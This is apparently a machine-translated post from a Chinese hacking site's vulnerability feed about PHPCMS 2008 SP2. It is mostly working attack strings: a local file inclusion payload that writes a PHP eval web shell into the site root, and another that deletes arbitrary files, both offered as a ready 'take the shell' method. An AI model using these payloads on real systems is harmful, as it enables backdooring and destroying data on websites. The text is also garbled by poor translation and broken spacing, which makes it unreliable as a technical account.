PHPCMS 2 0 0 8 SP2 latest local file inclusion vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201130077
Type myhack58
Reporter 佚名
Modified 2011-04-12T00:00:00


PHPCMS into the hardest hit. A vulnerability would allow people to storm out. 0day also often have. Nonsense not much said. Directly on the method. Take the shell method:

Contains:admin/safe. inc. php file GET submitted data

Will be generated under the root directory a word

Encrypt the following string:

$evil=’i=1&m=1&f=tmdsb&action=edit_code&file_path=tmdsb. php&code=<? eval($_POST[tmdsb])?& gt;&mod=../../admin/safe. inc. php%0 0';


Will be generated under the root directory word Trojan.

Arbitrary file delete vulnerability:

$evil=’i=1&m=1&f=tmdsb&action=del_file&files=robots. txt&mod=../../admin/safe. inc. php%0 0';